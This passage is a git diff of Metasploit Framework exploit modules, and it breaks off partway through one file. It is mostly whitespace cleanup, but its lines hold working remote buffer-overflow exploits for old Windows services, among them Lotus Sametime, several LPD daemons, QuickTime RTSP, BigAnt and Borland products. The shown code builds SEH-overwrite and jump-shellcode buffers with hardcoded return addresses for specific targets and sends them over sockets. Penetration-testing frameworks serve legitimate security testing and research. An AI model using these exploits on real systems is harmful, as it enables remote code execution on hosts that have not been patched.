] = [ 0x7ffaf0ec ].pack('V') # Fix Second crash (eax) + lang[ 68, 4 ] = [ 0x7ffaf0ec ].pack('V') # Fix Second crash (eax) lang[ 104, 4 ] = [ 0x7ffaf030 ].pack('V') # Fix First crash - lang[ 112, 4 ] = [target['FixESP']].pack('V') # 1 + lang[ 112, 4 ] = [target['FixESP']].pack('V') # 1 lang << "\x00" lang << payload.encoded if(not target['DisableNX']) lang[ 16, 15 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xc4 pop edi sub edi,-0x86 call edi").encode_string # 4 - lang[ 80, 4 ] = [target['JmpESP']].pack('V') # 2 + lang[ 80, 4 ] = [target['JmpESP']].pack('V') # 2 lang[ 84, 2 ] = Rex::Arch::X86.jmp_short(-0x46) # 3 jmp back to top else lang[ 16, 16 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xd8 pop edi pop edi sub edi,-0x86 call edi").encode_string # 8 - lang[ 80, 4 ] = [target['FixESI']].pack('V') # 2 + lang[ 80, 4 ] = [target['FixESI']].pack('V') # 2 lang[ 84, 4 ] = [target['FixEBP']].pack('V') # 3 - lang[ 88, 4 ] = [target['Ret']].pack('V') # 4 + lang[ 88, 4 ] = [target['Ret']].pack('V') # 4 lang[ 92, 4 ] = [target['JmpESP']].pack('V') # 6 - lang[ 100, 2 ] = Rex::Arch::X86.jmp_short(-0x56) # 7 jmp back to top - lang[ 108, 4 ] = [target['DisableNX']].pack('V') # 5 + lang[ 100, 2 ] = Rex::Arch::X86.jmp_short(-0x56) # 7 jmp back to top + lang[ 108, 4 ] = [target['DisableNX']].pack('V') # 5 end uri = rand_text_alpha_lower(16) + '.nsf?' + rand_text_highascii(1) # Trigger diff --git a/modules/exploits/windows/lotus/domino_sametime_stmux.rb b/modules/exploits/windows/lotus/domino_sametime_stmux.rb index d7789eade0..ad844750aa 100644 --- a/modules/exploits/windows/lotus/domino_sametime_stmux.rb +++ b/modules/exploits/windows/lotus/domino_sametime_stmux.rb @@ -21,22 +21,22 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'IBM Lotus Domino Sametime STMux.exe Stack Overflow', 'Description' => %q{ - This module exploits a stack overflow in Lotus Domino's Sametime + This module exploits a stack overflow in Lotus Domino\'s Sametime Server. By sending an overly long POST request to the Multiplexer STMux.exe service we are able to overwrite SEH. Based on the exploit by Manuel Santamarina Suarez. }, - 'Author' => [ 'patrick', 'riaf <riaf@mysec.org>' ], + 'Author' => [ 'patrick', 'riaf <riaf@mysec.org>' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => - [ - [ 'CVE', '2008-2499' ], - [ 'OSVDB', '45610' ], - [ 'BID', '29328' ], - [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-028/' ], - ], + [ + [ 'CVE', '2008-2499' ], + [ 'OSVDB', '45610' ], + [ 'BID', '29328' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-028/' ], + ], 'Privileged' => true, 'DefaultOptions' => { @@ -50,15 +50,15 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => ['win'], 'Targets' => - [ - # Patrick - Tested OK against Windows 2003 SP1 20081114 - [ 'Lotus Sametime 7.5 on Windows Server 2000 SP4', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 268 ] }], # pop ecx, pop exc, ret msvcr71.dll - [ 'Lotus Sametime 7.5 on Windows Server 2003 SP1', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 269 ] }], # pop ecx, pop exc, ret msvcr71.dll - [ 'Lotus Sametime 7.5 on Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }], - [ 'Lotus Sametime 7.5.1 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 5, 269 ] }], - [ 'Lotus Sametime 8.0.0 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }], - ], - 'DisclosureDate' => 'May 21 2008', + [ + # Patrick - Tested OK against Windows 2003 SP1 20081114 + [ 'Lotus Sametime 7.5 on Windows Server 2000 SP4', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 268 ] }], # pop ecx, pop exc, ret msvcr71.dll + [ 'Lotus Sametime 7.5 on Windows Server 2003 SP1', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 269 ] }], # pop ecx, pop exc, ret msvcr71.dll + [ 'Lotus Sametime 7.5 on Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }], + [ 'Lotus Sametime 7.5.1 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 5, 269 ] }], + [ 'Lotus Sametime 8.0.0 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }], + ], + 'DisclosureDate' => 'May 21 2008', 'DefaultTarget' => 1)) register_options( @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote res = sock.get_once(-1,3) disconnect - + if (res =~/200 OK/) return Exploit::CheckCode::Detected end @@ -101,16 +101,16 @@ class Metasploit3 < Msf::Exploit::Remote connect pad1 = rand_text_alpha_lower(44) - pad2 = rand_text_alpha_lower(29) + pad2 = rand_text_alpha_lower(29) # Patrick - We should use Metasm here. - popebx = Metasm::Shellcode.assemble(Metasm::Ia32.new, "pop ebx").encode_string * target['Offset'][0] - popad = Metasm::Shellcode.assemble(Metasm::Ia32.new, "popad").encode_string * target['Offset'][1] - esp = "\xff\x24\x24" # dword ptr ss:[esp] + popebx = Metasm::Shellcode.assemble(Metasm::Ia32.new, "pop ebx").encode_string * target['Offset'][0] + popad = Metasm::Shellcode.assemble(Metasm::Ia32.new, "popad").encode_string * target['Offset'][1] + esp = "\xff\x24\x24" # dword ptr ss:[esp] jmp = "\x74\x23" + "\x75\x21" # je short, jnz short - seh = [target['Ret']].pack('V') + seh = [target['Ret']].pack('V') - path = pad1 + jmp + seh + pad2 + popebx + popad + esp + path = pad1 + jmp + seh + pad2 + popebx + popad + esp req = "POST /CommunityCBR/CC.39.#{path}/\r\n" req << "User-Agent: Sametime Community Agent\r\n" diff --git a/modules/exploits/windows/lpd/hummingbird_exceed.rb b/modules/exploits/windows/lpd/hummingbird_exceed.rb index 6cccbdc908..97c157a18b 100644 --- a/modules/exploits/windows/lpd/hummingbird_exceed.rb +++ b/modules/exploits/windows/lpd/hummingbird_exceed.rb @@ -3,27 +3,25 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Hummingbird Connectivity 10 SP5 LPD Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Hummingbird Connectivity + This module exploits a stack overflow in Hummingbird Connectivity 10 LPD Daemon. This module has only been tested against Hummingbird Exceed v10 with SP5. }, @@ -37,12 +35,11 @@ class Metasploit3 < Msf::Exploit::Remote ['BID', '13788'], ], 'Privileged' => true, - + 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, - 'Payload' => { 'Space' => 500, @@ -50,27 +47,27 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Windows 2000 English SP0-SP4', { 'Offset' => 1620, 'Ret' => 0x75022ac4 }], ['Windows XP English SP0/SP1', { 'Offset' => 1596, 'Ret' => 0x71aa2461 }], ], 'DisclosureDate' => 'May 27 2005')) - - register_options( [ Opt::RPORT(515) ], self.class ) + + register_options( [ Opt::RPORT(515) ], self.class ) end def exploit connect - + filler = rand_text_english(target['Offset'], payload_badchars) seh = generate_seh_payload(target.ret) sploit = filler + seh print_status("Trying target #{target.name}...") sock.put(sploit) - + handler disconnect end diff --git a/modules/exploits/windows/lpd/niprint.rb b/modules/exploits/windows/lpd/niprint.rb index 7543f8c4a8..b4b9837277 100644 --- a/modules/exploits/windows/lpd/niprint.rb +++ b/modules/exploits/windows/lpd/niprint.rb @@ -3,27 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp - def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'NIPrint LPD Request Overflow', 'Description' => %q{ - This module exploits a stack overflow in the + This module exploits a stack overflow in the Network Instrument NIPrint LPD service. Inspired by Immunity's VisualSploit :-) }, @@ -38,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote ['URL', 'http://www.immunitysec.com/documentation/vs_niprint.html'], ], 'Privileged' => false, - 'Payload' => { 'Space' => 500, @@ -46,27 +42,26 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['NIPrint3.EXE (TDS:0x3a045ff2)', { 'Ret' => 0x00404236 }], # jmp esi ], - 'DefaultTarget' => 0)) - - register_options( [ Opt::RPORT(515) ], self.class ) + + register_options( [ Opt::RPORT(515) ], self.class ) end def exploit connect - + req = rand_text_alphanumeric(8192) req[ 0, 2] = "\xeb\x33" req[ 49, 4] = [target.ret].pack('V') req[ 53, payload.encoded.length ] = payload.encoded - + print_status("Trying target #{target.name}...") sock.put(req) - + handler disconnect end diff --git a/modules/exploits/windows/lpd/saplpd.rb b/modules/exploits/windows/lpd/saplpd.rb index dde52e75f6..6838db8a56 100644 --- a/modules/exploits/windows/lpd/saplpd.rb +++ b/modules/exploits/windows/lpd/saplpd.rb @@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking @@ -23,14 +21,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'SAP SAPLPD 6.28 Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in SAPlpd 6.28 (SAP Release 6.40) . - By sending an overly long argument, an attacker may be able to execute arbitrary - code. + By sending an overly long argument, an attacker may be able to execute arbitrary + code. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2008-0621' ], [ 'OSVDB', '41127' ], [ 'BID', '27613' ], @@ -44,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 400, 'BadChars' => "\x00\x0a", 'StackAdjustment' => -3500, - 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", + 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', 'Targets' => @@ -55,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Feb 4 2008', 'DefaultTarget' => 0)) - register_options([Opt::RPORT(515)], self) + register_options([Opt::RPORT(515)], self) end def exploit @@ -68,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit << [0xe9, -375].pack('CV') print_status("Trying target #{target.name}...") - + sock.puts(sploit) handler diff --git a/modules/exploits/windows/lpd/wincomlpd_admin.rb b/modules/exploits/windows/lpd/wincomlpd_admin.rb index 47a2815f58..7340385a94 100644 --- a/modules/exploits/windows/lpd/wincomlpd_admin.rb +++ b/modules/exploits/windows/lpd/wincomlpd_admin.rb @@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking @@ -23,15 +21,15 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'WinComLPD <= 3.0.2 Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in WinComLPD <= 3.0.2. - By sending an overly long authentication packet to the remote - adminstration service, an attacker may be able to execute arbitrary - code. + By sending an overly long authentication packet to the remote + adminstration service, an attacker may be able to execute arbitrary + code. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2008-5159'], ['OSVDB', '42861'], ['BID', '27614'], @@ -44,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 600, 'BadChars' => "\x00\x0a", - 'StackAdjustment' => -3500, + 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => @@ -55,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Feb 4 2008', 'DefaultTarget' => 0)) - register_options([Opt::RPORT(13500)], self) + register_options([Opt::RPORT(13500)], self) end def exploit @@ -69,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit << [0xe8, -550].pack('CV') + rand_text_alpha(rand(324) + 1) print_status("Trying target #{target.name}...") - + sock.puts(sploit) sleep(5) diff --git a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb index fff7aeb766..7b4d505e10 100644 --- a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb +++ b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb @@ -3,14 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -21,16 +19,16 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Apple QuickTime 7.3 RTSP Response Header Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Apple QuickTime 7.3. By sending an overly long - RTSP response to a client, an attacker may be able to execute arbitrary code. + RTSP response to a client, an attacker may be able to execute arbitrary code. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-6166' ], [ 'OSVDB', '40876' ], - [ 'BID', '26549' ], + [ 'BID', '26549' ], [ 'URL', 'http://milw0rm.com/exploits/4648' ], ], 'DefaultOptions' => @@ -54,17 +52,17 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The RTSP daemon port to listen on", 554 ]) ], self.class) end def on_client_connect(client) - return if ((p = regenerate_payload(client)) == nil) + return if ((p = regenerate_payload(client)) == nil) client.get_once - buffer = rand_text_english(target['Offset']) + Rex::Arch::X86.jmp_short(6) + make_nops(2) + buffer = rand_text_english(target['Offset']) + Rex::Arch::X86.jmp_short(6) + make_nops(2) buffer << [target.ret].pack('V') + payload.encoded + rand_text_english(4092 - payload.encoded.length) strname = rand_text_alpha(rand(75) + 1) @@ -75,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote header << "CSeq: 1\r\n" header << "Date: #{date}\r\n" header << "Content-Base: rtsp://0.0.0.0/#{strname}\r\n" - header << "Content-Type: #{buffer}\r\n" + header << "Content-Type: #{buffer}\r\n" header << "Content-Length: #{strname.length}\r\n\r\n" body = "v=#{num}\r\n" @@ -94,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote body << "a=control:#{strname}\r\n" sploit = header + body - + print_status("Sending #{sploit.length} bytes to #{client.peerhost}:#{client.peerport}...") client.put(sploit) diff --git a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb index 3de2519164..9dc47a6e69 100644 --- a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb +++ b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -28,8 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'Jacopo Cervini', 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2008-1491' ], [ 'OSVDB', '43638' ], [ 'BID', '28394' ], @@ -52,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'March 21 2008')) - register_options([Opt::RPORT(623)], self.class) + register_options([Opt::RPORT(623)], self.class) end diff --git a/modules/exploits/windows/misc/bigant_server.rb b/modules/exploits/windows/misc/bigant_server.rb index 03aae96fc4..caf42c27e7 100644 --- a/modules/exploits/windows/misc/bigant_server.rb +++ b/modules/exploits/windows/misc/bigant_server.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -24,14 +22,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'BigAnt Server 2.2 Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in BigAnt Server 2.2. - By sending a specially crafted packet, an attacker may be - able to execute arbitrary code. + By sending a specially crafted packet, an attacker may be + able to execute arbitrary code. }, 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, + 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2008-1914' ], [ 'OSVDB', '44454' ], [ 'BID', '28795' ], @@ -53,22 +51,21 @@ class Metasploit3 < Msf::Exploit::Remote 'Targets' => [ [ 'Windows 2000 Pro All English', { 'Ret' => 0x75022ac4 } ], - [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], + [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 15 2008')) - register_options([Opt::RPORT(6080)], self.class) - + register_options([Opt::RPORT(6080)], self.class) end def exploit connect - + sploit = "GET " + rand_text_alpha_upper(950) + generate_seh_payload(target.ret) sploit << rand_text_alpha_upper(1024 - payload.encoded.length) - - print_status("Trying target #{target.name}...") + + print_status("Trying target #{target.name}...") sock.put(sploit + "\n\n") handler diff --git a/modules/exploits/windows/misc/bigant_server_250.rb b/modules/exploits/windows/misc/bigant_server_250.rb index dc942cf8d6..fc831f2cb5 100644 --- a/modules/exploits/windows/misc/bigant_server_250.rb +++ b/modules/exploits/windows/misc/bigant_server_250.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -20,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'BigAnt Server 2.50 SP1 Buffer Overflow', 'Description' => %q{ This exploits a stack overflow in the BigAnt Messaging Service, @@ -36,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://www.exploit-db.com/exploits/9690' ] # It's not clear if these are correct - there was a fix for - # the v2.2 vuln back in Dec 2008 + # the v2.2 vuln back in Dec 2008 #[ 'C_VE', '2008-1914' ], #[ 'O_SVDB', '44454' ], #[ 'B_ID', '28795' ], @@ -56,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNops' => 'True', }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'BigAnt 2.5 Universal', { 'Ret' => 0x0f9a196a } ], # Tested OK (Dr_IDE & patrickw) p/p/r VBAJET32.dll xpsp3 & w2k [ 'Windows 2000 Pro All English', { 'Ret' => 0x75022ac4 } ], # p/p/r Tested OK (patrickw 20090918) @@ -64,19 +62,19 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DefaultTarget' => 0)) #, # 'DisclosureDate' => 'Apr 13 2008')) - - register_options([Opt::RPORT(6660)], self.class) + + register_options([Opt::RPORT(6660)], self.class) end def exploit connect - + sploit = "GET " + rand_text_alpha_upper(985) + generate_seh_payload(target.ret) sploit << rand_text_alpha_upper(1000 - payload.encoded.length) print_status("Trying target #{target.name}...") sock.put(sploit + "\r\n\r\n") - + handler disconnect end diff --git a/modules/exploits/windows/misc/bomberclone_overflow.rb b/modules/exploits/windows/misc/bomberclone_overflow.rb index d82ca81f38..1d6b805dec 100644 --- a/modules/exploits/windows/misc/bomberclone_overflow.rb +++ b/modules/exploits/windows/misc/bomberclone_overflow.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -22,18 +20,18 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Bomberclone 0.11.6 Buffer Overflow', 'Description' => %q{ - This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows. - The return address is overwritten with lstrcpyA memory address, - the second and third value are the destination buffer, - the fourth value is the source address of our buffer in the stack. - This exploit is like a return in libc. - - ATTENTION - The shellcode is exec ONLY when someone try to close bomberclone. + This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows. + The return address is overwritten with lstrcpyA memory address, + the second and third value are the destination buffer, + the fourth value is the source address of our buffer in the stack. + This exploit is like a return in libc. + + ATTENTION + The shellcode is exec ONLY when someone try to close bomberclone. }, 'Author' => 'Jacopo Cervini <acaro[at]jervus.it>', 'Version' => '$Revision$', - 'References' => + 'References' => [ ['CVE', '2006-0460'], ['OSVDB', '23263'], @@ -52,12 +50,11 @@ class Metasploit3 < Msf::Exploit::Remote ['Windows 2000 SP1 English', { 'Ret' => 0x77e85f08, } ], # kernel32!lstrcpyA ['Windows 2000 SP1 English', { 'Ret' => 0x77e95e8b, } ], # kernel32!lstrcpyA ], - 'Privileged' => false, 'DisclosureDate' => 'Feb 16 2006' )) - register_options([ Opt::RPORT(11000) ], self.class) + register_options([ Opt::RPORT(11000) ], self.class) end def exploit diff --git a/modules/exploits/windows/misc/bopup_comm.rb b/modules/exploits/windows/misc/bopup_comm.rb index bd7b4f3dca..4737831fb0 100644 --- a/modules/exploits/windows/misc/bopup_comm.rb +++ b/modules/exploits/windows/misc/bopup_comm.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -21,14 +25,14 @@ class Metasploit3 < Msf::Exploit::Remote able to execute arbitrary code. }, 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, + 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2009-2227' ], [ 'OSVDB', '55275' ], [ 'URL', 'http://www.blabsoft.com/products/server' ], - [ 'URL', 'http://milw0rm.com/exploits/9002' ], + [ 'URL', 'http://milw0rm.com/exploits/9002' ], ], 'DefaultOptions' => { @@ -50,13 +54,15 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 18 2009')) - register_options([Opt::RPORT(19810)], self.class) - + register_options( + [ + Opt::RPORT(19810) + ], self.class) end def exploit connect - + sploit = [0x00000001].pack('V') sploit << rand_text_alpha_upper(829 - payload.encoded.length) sploit << payload.encoded @@ -64,8 +70,8 @@ class Metasploit3 < Msf::Exploit::Remote sploit << rand_text_alpha_upper(27) sploit << Rex::Arch::X86.jmp_short(222) + rand_text_english(2) sploit << [target.ret].pack('V') - - print_status("Trying target #{target.name}...") + + print_status("Trying target #{target.name}...") sock.put(sploit) handler diff --git a/modules/exploits/windows/misc/borland_interbase.rb b/modules/exploits/windows/misc/borland_interbase.rb index 4f04721eca..ef67e53d2f 100644 --- a/modules/exploits/windows/misc/borland_interbase.rb +++ b/modules/exploits/windows/misc/borland_interbase.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -23,13 +21,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Borland Interbase Create-Request Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Borland Interbase 2007. - By sending a specially crafted create-request packet, a remote - attacker may be able to execute arbitrary code. + By sending a specially crafted create-request packet, a remote + attacker may be able to execute arbitrary code. }, 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2007-3566' ], [ 'OSVDB', '38602' ], [ 'URL', 'http://dvlabs.tippingpoint.com/advisory/TPTI-07-13' ], @@ -41,9 +39,9 @@ class Metasploit3 < Msf::Exploit::Remote 'Payload' => { 'Space' => 850, - 'BadChars' => "\x00", + 'BadChars' => "\x00", 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", - 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, + 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, }, 'Platform' => 'win', 'Targets' => @@ -54,16 +52,15 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'July 24 2007')) - register_options([Opt::RPORT(3050)], self.class) - + register_options([Opt::RPORT(3050)], self.class) end def exploit connect - # Build the exploit buffer.... It's a biggie! + # Build the exploit buffer.... It's a biggie! sploit = "\x00\x00\x00\x14" + "\x00\x00\x00\x13" + rand_text_alpha_upper(target['Offset']) - sploit << payload.encoded + Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2) + sploit << payload.encoded + Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2) sploit << [target.ret].pack('V') + [0xe8, -850].pack('CV') + rand_text_alpha_upper(40000) print_status("Trying target #{target.name}...") diff --git a/modules/exploits/windows/misc/borland_starteam.rb b/modules/exploits/windows/misc/borland_starteam.rb index 3f349f91e0..79ecaa42d7 100644 --- a/modules/exploits/windows/misc/borland_starteam.rb +++ b/modules/exploits/windows/misc/borland_starteam.rb @@ -1,14 +1,16 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -19,13 +21,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Borland CaliberRM StarTeam Multicast Service Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Borland CaliberRM 2006. By sending - a specially crafted GET request to the STMulticastService, an attacker may be - able to execute arbitrary code. + a specially crafted GET request to the STMulticastService, an attacker may be + able to execute arbitrary code. }, 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2008-0311' ], [ 'OSVDB', '44039' ], [ 'BID', '28602' ], @@ -37,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Payload' => { 'Space' => 600, - 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", + 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", 'StackAdjustment' => -3500, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", }, @@ -51,19 +53,18 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 2, 2008')) - register_options([Opt::RPORT(3057)], self.class) - + register_options([Opt::RPORT(3057)], self.class) end def exploit - + # inline payloads work best! - sploit = rand_text_english(511) + "\x00" + rand_text_english(1020) - sploit << [target.ret].pack('V') + "@" * 156 # <- :( + sploit = rand_text_english(511) + "\x00" + rand_text_english(1020) + sploit << [target.ret].pack('V') + "@" * 156 # <- :( sploit << payload.encoded + rand_text_english(rand(100) + 1) print_status("Trying target #{target.name}...") - + send_request_raw({'uri' => sploit,}, 5) handler diff --git a/modules/exploits/windows/misc/doubletake.rb b/modules/exploits/windows/misc/doubletake.rb index 583dc45902..677a39cac3 100644 --- a/modules/exploits/windows/misc/doubletake.rb +++ b/modules/exploits/windows/misc/doubletake.rb @@ -3,34 +3,34 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking + include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh + def initialize(info = {}) super(update_info(info, 'Name' => 'DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow', 'Description' => %q{ - This module exploits a stack 